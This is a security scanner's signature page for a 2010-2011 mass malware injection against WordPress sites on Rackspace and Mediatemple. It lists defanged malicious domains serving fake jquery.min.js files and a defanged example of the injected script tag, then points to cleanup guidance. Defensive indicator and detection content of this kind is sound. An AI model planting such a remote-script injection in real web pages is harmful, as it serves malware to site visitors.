SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware.rks_injection.2

malware.rks_injection.2

Description:
Malware injections related to massive hacks of websites hosted on Rackspace and Mediatemple back in 2010-2011

Loads malware from

hxxp://m3h.toolbarinc[.]com
hxxp://w7c5lrhqu .newsapis[.]us
hxxp://brown.smartenergymodel[.]com/js/ jquery.min.js
hxxp://azure.smartenergymodel[.]com /js/jquery.min.js
hxxp://r91nu.emapis[.]org /js / jquery.min.js
hxxp://d0j.emapis[.]org/js/ jquery.min.js
hxxp://khaki.smartenergymodel[.]com/ js/ jquery.min.js
hxxp://purple.gaindirectory[.]org/ js/ jquery.min.js
And other domains.

Typical injected code

< script src = hxxp:// azure.smartenergymodel[.]com /js/jquery.min.js> 

It infects .php, .html and .js files.

Related links:
http://blog.sucuri.net/2010/06/mass-attack-of-wordpress-blogs-on-rackspace.html
http://blog.unmaskparasites.com/2010/06/14/attack-on-wordpress-blogs-on-rackspace/

Affecting: WordPress websites. Mostly on Rackspace and Mediatemple.

Mitigation
How to clean a hacked WordPress site